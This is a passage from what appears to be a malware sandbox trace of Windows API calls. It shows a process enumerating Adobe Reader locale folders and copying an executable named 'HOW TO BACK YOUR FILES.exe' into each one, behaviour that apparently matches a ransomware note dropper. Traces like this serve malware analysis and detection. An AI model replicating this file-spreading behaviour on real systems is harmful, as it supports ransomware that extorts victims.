returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR" [0059.631] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0059.631] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0059.631] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR") returned 60 [0059.631] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR" [0059.631] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.631] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.637] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x550b7a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x550b7a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.637] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.637] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.638] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services" [0059.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0059.638] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services") returned 69 [0059.638] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services" [0059.638] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.638] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.645] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x550ddbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x550ddbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.645] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.645] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.645] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI" [0059.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0059.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0059.645] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI") returned 60 [0059.645] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI" [0059.645] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.645] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.652] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d723420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x550ddbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x550ddbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.652] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.652] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services" [0059.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0059.653] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services") returned 69 [0059.653] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services" [0059.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.659] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.659] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55103d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55103d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.659] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.659] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.659] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES" [0059.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0059.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0059.659] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES") returned 60 [0059.659] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES" [0059.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.668] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55103d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55103d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.668] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.668] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.669] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services" [0059.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0059.669] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services") returned 69 [0059.669] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services" [0059.669] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.669] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.675] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.675] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55129ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55129ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.676] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.676] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.676] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES" [0059.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0059.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0059.676] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES") returned 60 [0059.676] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES" [0059.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.682] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.682] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d63ebe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55129ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55129ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.682] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.682] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.683] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services" [0059.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0059.683] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services") returned 69 [0059.683] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services" [0059.683] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.683] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.689] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.689] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55150000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55150000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.690] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.690] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.690] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE" [0059.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0059.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0059.690] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE") returned 60 [0059.690] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE" [0059.690] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.690] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.696] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.696] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d723420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55150000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55150000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.696] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.696] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.697] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services" [0059.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0059.697] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services") returned 69 [0059.697] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services" [0059.697] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.697] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.703] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.703] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55176160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55176160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.704] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.704] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.704] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK" [0059.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0059.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0059.704] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK") returned 60 [0059.704] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK" [0059.704] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.704] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.710] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d723420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55176160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55176160, 